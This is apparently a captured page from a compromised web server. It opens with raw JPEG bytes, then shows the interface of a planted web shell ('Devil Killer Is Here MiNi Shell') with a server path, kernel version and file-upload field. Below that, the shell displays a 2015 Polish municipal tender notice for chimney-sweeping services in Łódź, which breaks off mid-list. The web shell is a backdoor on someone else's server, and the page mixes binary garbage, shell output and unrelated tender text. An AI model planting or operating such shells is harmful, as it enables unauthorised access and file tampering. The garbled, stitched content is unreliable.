JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151209/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151209/181601-N-2015.html

<p class="kh_header"><b>Łódź: Usługi kominiarskie obowiązkowe (wyciery i przeglądy przewodów kominowych) oraz nieobowiązkowe (dodatkowo zlecane) w nieruchomościach: Gminnych, Skarbu Państwa, współwłasnych z udziałem Gminy i  prywatnych administrowanych przez RON nr 1, 2, 3, 4 będących w zarządzie Zamawiającego, w podziale na osiem  (8) części</b><br>
<b>Numer ogłoszenia: 181601 - 2015; data zamieszczenia: 09.12.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Administracja Zasobów Komunalnych Łódź-Górna , ul. Lubelska 9/11, 93-129 Łódź, woj. łódzkie, tel. 42 684 52 19, faks 42 684 52 19.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.gorna.azk.lodz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi kominiarskie obowiązkowe (wyciery i przeglądy przewodów kominowych) oraz nieobowiązkowe (dodatkowo zlecane) w nieruchomościach: Gminnych, Skarbu Państwa, współwłasnych z udziałem Gminy i  prywatnych administrowanych przez RON nr 1, 2, 3, 4 będących w zarządzie Zamawiającego, w podziale na osiem  (8) części.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia są usługi kominiarskie obowiązkowe i nieobowiązkowe (dodatkowo zlecane) w nieruchomościach: Gminnych, Skarbu Państwa, współwłasnych i  prywatnych administrowanych przez  RON nr 1,nr 2, nr 3, nr 4,  będących w zarządzie Zamawiającego - Administracji Zasobów Komunalnych Łódź - Górna, w podziale na osiem (8) części - zgodnych z ustawą z dnia  07.07.1994 r. Prawo Budowlane (tekst jednolity Dz. U. z 2013 r. poz. 1409 ze zm.).
2. Przedmiot zamówienia podzielony jest na 8 (osiem) części.
3. Części I -V  i częściowo  w części VI postępowania:
Usługi kominiarskie  obowiązkowe (wyciery/czyszczenia i przeglądy przewodów 
kominowych) w nieruchomościach: Gminnych, Skarbu Państwa, współwłasnych i  prywatnych administrowanych przez RON nr 1, nr 2, nr 3, nr 4, będących w zarządzie Zamawiającego - zgodnie z wykazem adresowym nieruchomości  stanowiącym załącznik nr 13 do SIWZ  i  zakresem  czynności określonym w formularzach cenowych stanowiących Załączniki nr 2.1-2.5 oraz 2.6.1.P - 2.6.4.P do SIWZ,  które obejmują następujące ilości przewodów kominowych: 
Część I:
Gmina, Skarb Państwa,Załącznik: 2.1.RON nr 1- czynności obowiązkowe, 
Budynki mieszkalne/ użytkowe;  
Przewody dymowe:	1257/6  szt.
Przewody spalinowe:	252/8 szt.
Przewody wentylacyjne:	2938/77 szt.
Ogółem przewodów:	4447/91 szt.
Część II:
Gmina, Skarb Państwa, Załącznik: 2.2.RON nr 2 - czynności obowiązkowe, 
Budynki mieszkalne/ użytkowe;
Przewody dymowe: 655/6 szt.
Przewody spalinowe: 22/6 szt.
Przewody wentylacyjne: 842/555 szt.
Ogółem przewodów:1519/567 szt.
Część III:
Gmina, Skarb Państwa,Załącznik: 2.3.RON nr 3 - czynności obowiązkowe, 
Budynki mieszkalne/ użytkowe;
Przewody dymowe: 1301/2 szt.
Przewody spalinowe: 78/1 szt.
Przewody wentylacyjne: 1509/44 szt.
Ogółem przewodów:2888/47 szt.
Część IV:
Gmina, Skarb Państwa,Załącznik: 2.4.RON nr 4 - czynności obowiązkowe, 
Budynki mieszkalne/ użytkowe;
Przewody dymowe: 1803/57 szt.
Przewody spalinowe: 75/3 szt.
Przewody wentylacyjne: 693/274 szt.
Ogółem przewodów: 2571/334 szt.
Część V:
Współwłasne z udziałem gminy powyżej 50%,Załącznik: 2.5.RON nr 1,2,3,4 - czynności obowiązkowe,
Budynki mieszkalne/ użytkowe;
Przewody dymowe: 42 szt.
Przewody spalinowe: 9 szt.
Przewody wentylacyjne:112/17 szt.
Ogółem przewodów:167/17 szt.
Część VI - (RON nr 1):
Prywatne i współwłasne z udziałem gminy poniżej 50%,Załączniki: 2.6.1.P, 2.6.P.DOD,- czynności obowiązkowe i dodatkowe,
Budynki mieszkalne/ użytkowe;
Przewody dymowe: 197  szt.
Przewody spalinowe: 20 szt.
Przewody wentylacyjne: 425 szt.
Ogółem przewodów:	642 szt.

Część VI - (RON nr 2):
Prywatne i współwłasne z udziałem gminy poniżej 50%,Załączniki: 2.6.2.P, 2.6.P.DOD,- czynności obowiązkowe i dodatkowe,
Budynki mieszkalne/ użytkowe;
Przewody dymowe: 266 szt.
Przewody spalinowe: 1/4 szt. szt.
Przewody wentylacyjne:191/252 szt. szt.
Ogółem przewodów:	458/256 szt.
 Część VI - (RON nr 3):
Prywatne i współwłasne z udziałem gminy poniżej 50%,Załączniki: 2.6.3.P, 2.6.P.DOD,- czynności obowiązkowe i dodatkowe,
Budynki mieszkalne/ użytkowe;
Przewody dymowe: 150 szt.
Przewody spalinowe: 9 szt.
Przewody wentylacyjne: 170 szt.
Ogółem przewodów:329 szt.
Część VI - (RON nr 4):
Prywatne i współwłasne z udziałem gminy poniżej 50%,Załączniki: 2.6.4.P, 2.6.P.DOD,- czynności obowiązkowe i dodatkowe,
Budynki mieszkalne/ użytkowe;
Przewody dymowe: 454 szt.
Przewody spalinowe: 15 szt.
Przewody wentylacyjne: 221 szt.
Ogółem przewodów: 690 szt.
Część VII-Nieruchomości Gmina, Skarb Państwa,RON nr 1, 2, 3, 4 
Budynki mieszkalne/ użytkowe - czynności dodatkowe - Załącznik: 2.7.DOD;
Część VIII - Nieruchomości współwłasne  z udziałem Gminy powyżej 50%
Budynki mieszkalne/ użytkowe-czynności dodatkowe- Załącznik: 2.8.DOD.
   3.1. Wyciery/czyszczenie przewodów dymowych, spalinowych i wentylacyjnych, w celu 
        utrzymania ich drożności i bezpiecznego funkcjonowania wraz z wybraniem i wyniesieniem z 
        budynku sadzy w workach foliowych w terminach i na zasadach określonych w rozporządzeniu 
        MSWiA z dnia 07 czerwca 2010 r. w sprawie ochrony przeciwpożarowej budynków, innych 
        obiektów budowlanych i terenów (Dz. U. z 2010 r.  Nr 109, poz. 719 z późn. zm.):
3.1.1.Wyciery przewodów będą wykonywane według harmonogramu opracowanego przez 
          Wykonawcę w terminie: maksymalnie do 30 dni od dnia  zawarcia umów. Harmonogram zostanie 
          sporządzony dla wszystkich nieruchomości w każdej części postępowania w uzgodnieniu z 
          koordynatorami poszczególnych RON-ów - miesięcznie -  odrębnie na każdy miesiąc      
          kalendarzowy dla całego 2016 r.
3.1.2. Wykonawca przed przystąpieniem do wykonania usług zgodnie z przedłożonym 
    harmonogramem, powiadomi mieszkańców budynku poprzez wywieszenie zawiadomienia 
    w budynku, w  widocznym miejscu - na co najmniej trzy dni przed planowanym 
    wykonaniem usługi.
3.1.3. Częstotliwość świadczenia usługi obejmuje:
      a) czyszczenie przewodów dymowych - 4 razy w roku, w równych odstępach częstotliwości - raz 
            na kwartał, (czwarte ostatnie czyszczenie max. do 15.11.2016 r.),
      b) czyszczenie przewodów spalinowych - 2 razy w roku tj. pierwszy raz  do końca czerwca   
             2016 r., drugi raz do15 listopada 2016 r.,
      c) czyszczenie przewodów wentylacyjnych - 1 raz w roku - max. do 15.11.2016 r.,
            Gdy brak drożności przewodów pomiędzy czasookresami obowiązkowych czyszczeń 
              Wykonawca wykonuje czyszczenie nieodpłatnie w ramach udzielonej gwarancji. 
3.2. Okresowe przeglądy stanu technicznego przewodów kominowych (dymowych, spalinowych i 
        wentylacyjnych) w budynkach z instalacją gazową i bez instalacji gazowej - zgodnie z ustawą z 
        dnia 07.07.1994 r. - Prawo Budowlane (tekst jednolity Dz. U. z 2013 r. poz. 1409 ze zm.):
a)	kontrole okresowe winny być przeprowadzone sukcesywnie 1 raz w ciągu całego roku i zakończone w terminie do dnia 15 listopada 2016 r. ,a w budynkach wyposażonych w instalację gazową do dnia 31 maja 2016r. 
      oraz na bieżąco w zależności od rzeczywistych potrzeb wykonania usług, 
b)	kontrole okresowe będą wykonywane według harmonogramu opracowanego przez Wykonawcę w terminie: maksymalnie do 30 dni od dnia zawarcia umów. Harmonogram zostanie sporządzony w uzgodnieniu z koordynatorami poszczególnych RON-ów - miesięcznie - odrębnie na każdy miesiąc kalendarzowy dla całego 2016 r.,
c)	każdy przegląd przewodów kominowych w budynku, Wykonawca potwierdza opinią kominiarską, która będzie stanowiła podstawę do wystawienia faktur.
3.3.  Zakres okresowego przeglądu technicznego obejmuje:
    3.3.1. sprawdzenie drożności przewodów kominowych: dymowych, spalinowych i wentylacyjnych,
     3.3.2.  sprawdzenie siły ciągu kominowego (podciśnienie) zapewniającego prawidłowe działanie 
          podłączonych do przewodów urządzeń grzewczo-kominowych,
    3.3.3.  sprawdzenie ogólnego stanu technicznego (przydatność, uszkodzenia) przewodów 
        kominowych na całej ich długości, a także kanałów, czopuchów, rur i łączników, 
        nawiewników okiennych włazów, drabin, drzwiczek kominowych (wyczystnych i 
        rewizyjnych), ław kominiarskich i nasad kominowych, pobielenia komina w obrębie strychu,
3.3.4.  sprawdzenie czy lokale, w których zainstalowane są urządzenia grzewcze (trzony kuchenne, piece, 
         piecyki wody przepływowej, kotły c.o. itp.) posiadają sprawnie działające przewody kominowe, w 
         tym wywiewne i nawiewne tzn.:
 1/ czy jest zapewniony dostęp powietrza zewnętrznego koniecznego do prawidłowej cyrkulacji 
      powietrza w lokalu (mieszkaniu),
              2/ czy zainstalowane są prawidłowe kratki wentylacyjne (wielkość pow. chłonnej), nawiewniki 
                   okienne,
3/  czy nie zainstalowano kratek wentylacyjnych z żaluzjami umożliwiającymi zamykanie lub
     ograniczanie przepływu powietrza,
4/ sprawdzenie czy w lokalu istnieją urządzenia wymuszające ciąg kominowy w przypadku, gdy 
     istnieją paleniska obsługiwane ciągiem grawitacyjnym lub gdy urządzenia te funkcjonują w 
     przewodach wentylacji zbiorczej,
5/ sprawdzenie czy istnieje dogodny dostęp do czyszczenia i przeprowadzenia okresowych kontroli 
     przewodów kominowych, kanałów, czopuchów, rur i nasad kominowych w tym: dostęp do 
     drzwiczek wyciorowych i rewizyjnych,
6/ sprawdzenie czy nie są składowane materiały łatwopalne lub inne przedmioty w bezpośrednim 
     sąsiedztwie drzwiczek rewizyjnych i wyciorowych,
7/  sprawdzenie występowania innych nieprawidłowości, mogących spowodować zagrożenie 
     bezpieczeństwa ludzi albo mienia. 
3.4. Wykonawca zobowiązany jest  przed przystąpieniem do wykonania usług zgodnie z 
       przedłożonym harmonogramem, powiadomić mieszkańców budynku poprzez wywieszenie 
       zawiadomienia w budynku, w  widocznym miejscu - na co najmniej trzy dni przed planowanym 
 wykonaniem usługi.
    3.5. Wykonawca zobowiązany będzie do sporządzania zestawień rozliczeniowych za wykonane 
            czynności usługowe na podstawie faktycznie wykonanych czynności w oparciu o formularz cenowy 
            odrębnie, dla każdej nieruchomości. 

Część VII, VIII i częściowo VI postępowania:

   4.   Usługi kominiarskie nieobowiązkowe (dodatkowo zlecane) w nieruchomościach: Gminnych,             
         Skarbu Państwa i współwłasnych z udziałem gminy powyżej 50%, prywatnych i współwłasnych z udziałem Gminy równym i poniżej 50%, administrowanych przez RON nr 1, nr 2, nr 3, nr 4, będących w zarządzie Zamawiającego - zgodnie z wykazem adresowym nieruchomości stanowiącym załącznik nr 13 do SIWZ.
   4.1. Szczegółowy zakres czynności określony został w formularzach cenowych stanowiących Załączniki 
          nr 2.6.P.DOD oraz 2.7 DOD -2.8.DOD do SIWZ.
   4.2. Wykonawca zobowiązany będzie do sporządzania zestawień rozliczeniowych z otrzymanych 
          zarejestrowanych zleceń za wykonane czynności usługowe na podstawie faktycznie wykonanych 
          czynności w oparciu o formularz cenowy odrębnie, dla każdej nieruchomości. 

 5. W ramach przedmiotu zamówienia Zamawiający wymaga od Wykonawcy:
5.1.  niezwłocznego informowania Zamawiającego o konieczności usunięcia zauważonych przy 
        czyszczeniu przewodów  kominowych usterek lub zaniedbań grożących  niebezpieczeństwem 
        powstania pożaru lub zagrożeniem utraty zdrowia, a zwłaszcza w przypadku użytkowania  w 
        lokalach gazu płynnego z butli gazowych (propan-butan);
5.2.  sporządzania faktycznej dokumentacji to jest: 
        5.2.1. opinii z przeprowadzonych oględzin, ekspertyz, protokołów z wykonanych przeglądów 
                   wraz z rysunkami obejmującymi naniesienia przewodów kominowych  (na rzucie dachu     
                   budynku z zaznaczeniem rodzaju przewodu , podłączonymi do niego lokalami z oznaczona 
                   jego numeracją wraz z oznaczeniem kondygnacji na których lokale są usytuowane, a także 
                   rodzajem włączonego do przewodu urządzenia);
5.3. z przeprowadzonych przeglądów wystawiania i dostarczania Zamawiającemu protokołów lub 
       opinii  podpisanych przez osobę posiadającą stosowne kwalifikacje i uprawnienia zawodowe,     
       niezbędnych do rozliczania wykonanych usług;
        5.3.1. w razie stwierdzenia podczas przeglądu nieprawidłowości zagrażających bezpośrednio 
             zdrowiu lub życiu osób, Wykonawca zawiadamia Zamawiającego o tym zagrożeniu   
             niezwłocznie tj. nie później niż w ciągu 24 godzin od stwierdzenia tych 
             nieprawidłowości,
   5.3.2. w przypadku braku możliwości dostania się do budynku/lokalu, Wykonawca zgłasza ten 
             fakt niezwłocznie administratorowi budynku, celem uzgodnienia kolejnego terminu 
             kontroli,
5.4.  wydawania indywidualnych opinii kominiarskich w razie zaistnienia takiej konieczności w 
        zakresie prawidłowości podłączeń przewodów kominowych i ich stanu technicznego, na 
        zlecenie, które wystawia administrator nieruchomości określając : adres nieruchomości, 
        nr lokalu oraz opis usterek;
5.5.  przyjmowania zgłoszeń w przypadkach awaryjnych wymagających natychmiastowej interwencji  
        kominiarskiej po godzinach pracy Zamawiającego oraz w dni wolne od pracy;

6. Wymaga się, aby opinie były składane Zamawiającemu maksymalnie w ciągu 7 dni 
     kalendarzowych od daty przekazania zlecenia przez Zamawiającego, a w przypadku stwierdzenia 
     przez Wykonawcę stanu zagrożenia zdrowia lub życia mieszkańców, niezwłocznie tj. w dniu 
     kontroli lokalu.  Opinia będzie musiała zawierać: dokładny opis istniejącego przedmiotu opinii, 
     szczegółowy opis zaleceń, które trzeba wykonać w celu usunięcia stwierdzonych 
     nieprawidłowości wraz z opisem zakresu  (precyzyjnym opisem stanu technicznego przewodu 
     kominowego z wymiarowaniem miejsca uszkodzenia - również w zapisie elektronicznym na 
     nośniku przenośnym danych) oraz metody wykonania przemurowania czy uszczelnienia komina, 
     numer mieszkania oraz rysunek zawierający rzut przewodów kominowych w opiniowanym 
     fragmencie budynku, którego opinia dotyczy. Opinie nie zawierające tych informacji nie zostaną 
     przez Zamawiającego przyjęte do rozliczenia.
7. Wykonawca po wykonaniu przez najemcę  prac objętych opinią kominiarską jest zobowiązany      
     dokonać ponownego sprawdzenia wykonania zaleceń, które zostały ujęte w jego opinii z 
     podanym terminem ich wykonania. W przypadku stwierdzenia nieprawidłowości, do obowiązku 
     Wykonawcy należy powiadomienie o tym fakcie Zamawiającego, celem podjęcia stosownych 
     działań.
8. W przypadkach, gdy Zamawiający wyrazi zgodę najemcy lokalu na montaż kotła c.o. lub kotła 
     dwufunkcyjnego c.o. i c.wu., Wykonawca, wyda stosowną opinię wyłącznie na wniosek 
     administratora  lub przedstawiciela Zamawiającego.   
 9. Zamawiający zaleca przeprowadzenie wizji lokalnej celem szczegółowego zapoznania się ze 
       specyfiką i charakterem nieruchomości objętych zamówieniem. Zamawiający nie będzie 
       respektował zarzutów wynikających z nieznajomości przez wykonawców specyfiki i charakteru 
       nieruchomości, jeśli okoliczności te możliwe były do ustalenia przy przeprowadzonej z należytą 
       starannością wizji lokalnej. 
 10. Zamawiający dopuszcza składanie ofert częściowych na dowolnie wybrane przez Wykonawcę      
       części postępowania.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 90.91.50.00-4, 71.31.54.00-3, 71.50.00.00-3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 8.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań - żąda oświadczenia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże w zał. nr 4 do SIWZ, że w okresie ostatnich trzech lat przed     
         upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym 
         okresie, wykonał usługi w zakresie usług kominiarskich (trwające minimum 12 miesięcy)  
         o wartości co najmniej  do wysokości  składanej oferty wraz z załączeniem dokumentów - 
         dowodów potwierdzających, że wykazane  przez Wykonawcę usługi zostały wykonane lub są 
         wykonywane należycie.
         Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą: spełnia - nie spełnia, 
     w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w rozdziale 6  
     SIWZ.  Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunek 
     Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca spełni warunek w sytuacji, kiedy wykaże w zał. nr 5 do SIWZ, że dysponuje 
             potencjałem technicznym (sprzętem) gwarantującym terminowe i jakościowo dobre wykonanie 
             usług:  
     1) dla części od 1 - do 5 (niezależnie czy przystępuje do jednej części czy tych pięciu części): 
              minimum: 2 szt. - kamera kominowa,  1 szt. - detektor tlenku węgla, 1 szt. -  analizator spalin, 
              8 szt. - anemometr ciągowy, 
         2) dla części od 6 - do 8 (niezależnie czy przystępuje do jednej części czy tych trzech części): 
              minimum 2 szt. - kamera kominowa, 1 szt. - detektor tlenku węgla, 1 szt. -  analizator spalin, 
             8 szt. - anemometr ciągowy,
          -  zgodnie z wymogami technologicznymi dla prowadzenia usług kominiarskich.
Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą: spełnia - nie spełnia, 
     w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w rozdziale 6  
     SIWZ.  Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunek 
     Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. Wykonawca spełni warunek w sytuacji, kiedy wykaże w zał. nr 6 do SIWZ, że dysponuje:            
         1) dla części od 1 - do 5 (niezależnie czy przystępuje do jednej części czy tych pięciu części): 
      minimum 6 osób w zawodzie kominiarskim, w tym:  
      co najmniej 5 osób posiadających tytuł mistrza kominiarskiego; 
  2) dla części od 6 - do 8 (niezależnie czy przystępuje do jednej części czy tych trzech części):
      minimum 5 osób w zawodzie kominiarskim, w tym:
      co najmniej 4 osoby posiadające tytuł mistrza kominiarskiego.
Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą: spełnia - nie spełnia, 
     w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w rozdziale 6  
     SIWZ.  Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunek 
     Wykonawca spełnił.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca spełni warunek w sytuacji, kiedy wykaże, że jest ubezpieczony od odpowiedzialności 
     cywilnej, kontraktowej i deliktowej w zakresie prowadzonej działalności gospodarczej związanej             
     z przedmiotem zamówienia na kwotę minimum (sumę ubezpieczenia) stanowiącą  100% ceny 
     oferty. Spełnienie tego warunku będzie oceniane łącznie z dowodem zapłaty, o ile wprost z treści 
     polisy, a w przypadku jej braku innego dokumentu nie będzie wynikało, że jest ona opłacona.
     Jeżeli w trakcie realizacji umowy polisa straci ważność, Zamawiający będzie żądał  przedłożenia 
     kserokopii nowej polisy potwierdzonej za zgodność z oryginałem.
Ocena spełniania w/w warunku dokonana zostanie zgodnie z formułą: spełnia - nie spełnia, 
     w oparciu o informacje zawarte w oświadczeniach i dokumentach wyszczególnionych w rozdziale 6  
     SIWZ.  Z treści załączonych dokumentów musi wynikać jednoznacznie, iż w/w warunek 
     Wykonawca spełnił.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

